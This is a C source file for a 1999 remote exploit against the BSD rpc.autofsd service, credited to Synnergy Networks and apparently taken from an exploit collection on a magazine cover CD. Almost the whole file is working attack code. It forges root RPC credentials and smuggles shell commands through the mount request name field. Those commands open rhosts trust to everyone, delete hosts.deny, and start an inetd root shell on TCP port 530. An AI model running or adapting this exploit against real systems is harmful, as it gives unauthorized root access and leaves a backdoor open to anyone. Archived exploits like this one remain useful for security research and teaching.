Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / bsd / remote / rpc.autofsd.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 3.1 KB | 143 lines

// *** Synnergy Networks // * Description: // // Remote exploit for rpc.autofsd on BSD. This will attempt to put a root shell // on tcp port 530. // * Author: // // guidob (guidob@synnergy.net) // Synnergy Networks (c) 1999, http://www.synnergy.net // * Greets: // // Synnergy Networks, LoU, Cindy // * Comments: // // This will not work on all types and/or versions. // *** Synnergy Networks #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <rpc/rpc.h> #include <rpc/xdr.h> #include <signal.h> #define AUTOFS_PROG ((u_long)100099) #define AUTOFS_VERS ((u_long)1) #define AUTOFS_MOUNT ((u_long)1) #define AT 8 #define A_MAXNAME 255 #define A_MAXOPTS 255 #define A_MAXPATH 1024 struct mntrequest { char *name; /* name to be looked up */ char *map; /* map to use [2000]*/ char *opts; /* default options[2000]*/ char *path; /* mountpoint to use */ }; struct mntres { int status; /* 0=OK, otherwise an errno from <sys/errno.h> */ }; bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp) { if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE); if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE); if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE); if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE); return (TRUE); } void signal_handler(void) { exit(0); } bool_t xdr_mntres(XDR *xdrs,struct mntres *objp) { if (!xdr_int(xdrs, &objp->status)) return (FALSE); return (TRUE); } main(int argc, char **argv) { CLIENT *cl; struct mntrequest mntreq; struct mntres *res; struct sockaddr_in target; struct hostent *hp; struct timeval tm; char *host; enum clnt_stat stat; int sd; signal(SIGALRM, signal_handler); alarm(AT); host=argv[1]; if ((target.sin_addr.s_addr = inet_addr(host)) == -1) { if ((hp = gethostbyname(host)) == NULL) { printf("%s: cannot resolve\n", host); exit(1); } else target.sin_addr.s_addr = *(u_long *)hp->h_addr; } target.sin_family=AF_INET; target.sin_port=0; sd=RPC_ANYSOCK; tm.tv_sec=8; tm.tv_usec=0; if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL) { clnt_pcreateerror("clnt_create"); exit(0); } cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL); tm.tv_sec = 25; /* echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob */ mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd /tmp/bob"; /* Tu mozna wstawic co sie chce */ mntreq.map="/bin/true"; mntreq.path="/hosts"; mntreq.opts=""; bzero((char *)&res, sizeof(res)); if ((stat = clnt_call(cl, AUTOFS_MOUNT, (xdrproc_t)xdr_mntrequest,&mntreq, (xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS) { clnt_perror(cl, "clnt_call"); exit(1); } clnt_destroy(cl); } // EOF